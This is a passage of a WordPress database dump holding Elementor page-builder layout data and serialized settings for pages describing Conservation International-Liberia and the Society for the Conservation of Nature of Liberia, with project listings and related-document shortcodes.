]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3054dac6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"21e7308e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"331470f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ci\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27386,3980,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27387,3980,'_thumbnail_id','3214'),(27389,3981,'_elementor_edit_mode','builder'),(27390,3981,'_elementor_template_type','wp-post'),(27391,3981,'_elementor_version','2.7.5'),(27392,3981,'_wp_page_template','default'),(27393,3981,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23bf9b5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.<\\/p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI\\u2019s reach is truly global.<\\/p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a2232e5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"11bbe920\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a1852cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"45f11703\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ci\\\",\\\"tag_id\\\":\\\"50\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ci\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2db389f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3054dac6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"21e7308e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"331470f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ci\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27394,3981,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27395,3981,'_thumbnail_id','3214'),(27397,1612,'internet','https://www.conservation.org/'),(27398,1612,'_pods_institution_logo','a:1:{i:0;i:2232;}'),(27399,1612,'institution_logo','2232'),(27400,2769,'_last_editor_used_jetpack','classic-editor'),(27401,3982,'_elementor_edit_mode','builder'),(27402,3982,'_elementor_template_type','wp-post'),(27403,3982,'_elementor_version','2.7.5'),(27404,3982,'_wp_page_template','default'),(27405,3982,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Society for the Conservation of Nature of Liberia (SCNL) is Liberia\\u2019s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia\\u2019s natural resources to ensure a healthy environment and good quality life for all people in Liberia.<\\/p><p>SCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"scnl\\\",\\\"tag_id\\\":\\\"210\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"scnl\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:scnl\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27406,3982,'_thumbnail_id','2770'),(27407,3982,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27408,3983,'_elementor_edit_mode','builder'),(27409,3983,'_elementor_template_type','wp-post'),(27410,3983,'_elementor_version','2.7.5'),(27411,3983,'_wp_page_template','default'),(27412,3983,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Society for the Conservation of Nature of Liberia (SCNL) is Liberia\\u2019s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia\\u2019s natural resources to ensure a healthy environment and good quality life for all people in Liberia.<\\/p><p>SCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"scnl\\\",\\\"tag_id\\\":\\\"210\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"scnl\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, 